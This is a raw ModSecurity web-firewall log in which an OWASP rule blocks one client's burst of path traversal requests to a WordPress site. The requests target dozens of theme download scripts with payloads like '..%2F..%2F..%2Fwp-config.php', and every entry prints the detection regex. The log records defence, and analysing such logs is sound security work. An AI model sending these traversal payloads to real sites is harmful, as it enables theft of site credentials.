"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cakifo/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cakifo/download.php"] [unique_id "YtsceHhurfgLch3PImzIJAAAAMY"] [Fri Jul 22 16:54:00.169424 2022] [:error] [pid 22470:tid 140016965560064] [client 72.11.157.116:51746] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/derby-book-festival/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/derby-book-festival/download.php"] [unique_id "YtsceHxqqtgWgIAXsGFhlAAAABU"] [Fri Jul 22 16:54:00.260381 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:51748] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/EEEZ/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/EEEZ/download.php"] [unique_id "YtsceHhurfgLch3PImzIJQAAAMo"] [Fri Jul 22 16:54:00.350454 2022] [:error] [pid 23081:tid 140017141806848] [client 72.11.157.116:51750] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/greenearth-v1-06/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/greenearth-v1-06/download.php"] [unique_id "YtsceHhurfgLch3PImzIJgAAAMA"] [Fri Jul 22 16:54:00.440208 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51752] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IqraAcademy/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IqraAcademy/download/download.php"] [unique_id "YtsceHhurfgLch3PImzIJwAAAME"] [Fri Jul 22 16:54:00.530188 2022] [:error] [pid 22472:tid 140017007523584] [client 72.11.157.116:51754] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lmm5th/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lmm5th/download.php"] [unique_id "YtsceCpbG8_UBGXeM63w5QAAAJA"] [Fri Jul 22 16:54:00.624505 2022] [:error] [pid 22471:tid 140017015916288] [client 72.11.157.116:51756] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/loom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/loom/download.php"] [unique_id "YtsceOCtYZwatdwcM8Wq5gAAAE8"] [Fri Jul 22 16:54:00.727058 2022] [:error] [pid 22471:tid 140016999130880] [client 72.11.157.116:51758] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mercato/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mercato/framework/utilities/download/getfile.php"] [unique_id "YtsceOCtYZwatdwcM8Wq5wAAAFE"] [Fri Jul 22 16:54:00.819094 2022] [:error] [pid 22470:tid 140016982345472] [client 72.11.157.116:51760] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "YtsceHxqqtgWgIAXsGFhlQAAABM"] [Fri Jul 22 16:54:00.923373 2022] [:error] [pid 22472:tid 140017024308992] [client 72.11.157.116:51762] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ParentingOurParents/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ParentingOurParents/download/download.php"] [unique_id "YtsceCpbG8_UBGXeM63w5gAAAI4"] [Fri Jul 22 16:54:01.013553 2022] [:error] [pid 23081:tid 140017015916288] [client 72.11.157.116:51764] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/salient/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/salient/download.php"] [unique_id "YtsceXhurfgLch3PImzIKAAAAM8"] [Fri Jul 22 16:54:01.116778 2022] [:error] [pid 22472:tid 140017049487104] [client 72.11.157.116:51768] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyseventeen/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyseventeen/download.php"] [unique_id "YtsceSpbG8_UBGXeM63w6AAAAIs"] [Fri Jul 22 16:54:01.218710 2022] [:error] [pid 22472:tid 140016940381952] [client 72.11.157.116:51770] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/verse/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/verse/download.php"] [unique_id "YtsceSpbG8_UBGXeM63w6QAAAJg"] [Fri Jul 22 16:54:01.318796 2022] [:error] [pid 22472:tid 140017108236032] [client 72.11.157.116:51772] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/wp-clean-slate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/wp-clean-slate/download.php"] [unique_id "YtsceSpbG8_UBGXeM63w6gAAAIQ"] [Fri Jul 22 16:54:01.432035 2022] [:error] [pid 22472:tid 140017015916288] [client 72.11.157.116:51774] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippe-riehling/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/philippe-riehling/functions/download.php"] [unique_id "YtsceSpbG8_UBGXeM63w6wAAAI8"] [Fri Jul 22 16:54:01.529111 2022] [:error] [pid 23081:tid 140017049487104] [client 72.11.157.116:51776] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/directory-starter/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/directory-starter/download.php"] [unique_id "YtsceXhurfgLch3PImzIKQAAAMs"] [Fri Jul 22 16:54:01.624392 2022] [:error] [pid 23081:tid 140017125021440] [client 72.11.157.116:51778] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/firestarter/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/firestarter/down.php"] [unique_id "YtsceXhurfgLch3PImzIKgAAAMI"] [Fri Jul 22 16:54:01.715066 2022] [:error] [pid 23081:tid 140017083057920] [client 72.11.157.116:51780] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/presstissimo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/presstissimo/download.php"] [unique_id "YtsceXhurfgLch3PImzIKwAAAMc"] [Fri Jul 22 16:54:01.809446 2022] [:error] [pid 22470:tid 140017099843328] [client 72.11.157.116:51782] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acamir-theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acamir-theme/down.php"] [unique_id "YtsceXxqqtgWgIAXsGFhlgAAAAU"] [Fri Jul 22 16:54:01.902185 2022] [:error] [pid 22470:tid 140016973952768] [client 72.11.157.116:51784] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/agency/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/agency/down.php"] [unique_id "YtsceXxqqtgWgIAXsGFhlwAAABQ"] [Fri Jul 22 16:54:01.992883 2022] [:error] [pid 23081:tid 140017032701696] [client 72.11.157.116:51786] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/comune-di-fornelli/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/comune-di-fornelli/down.php"] [unique_id "YtsceXhurfgLch3PImzILAAAAM0"] [Fri Jul 22 16:54:02.089518 2022] [:error] [pid 23081:tid 140016940381952] [client 72.11.157.116:51788] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/delia/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/delia/down.php"] [unique_id "YtscenhurfgLch3PImzILQAAANg"] [Fri Jul 22 16:54:02.186458 2022] [:error] [pid 23081:tid 140017066272512] [client 72.11.157.116:51790] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/g5_helium/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname 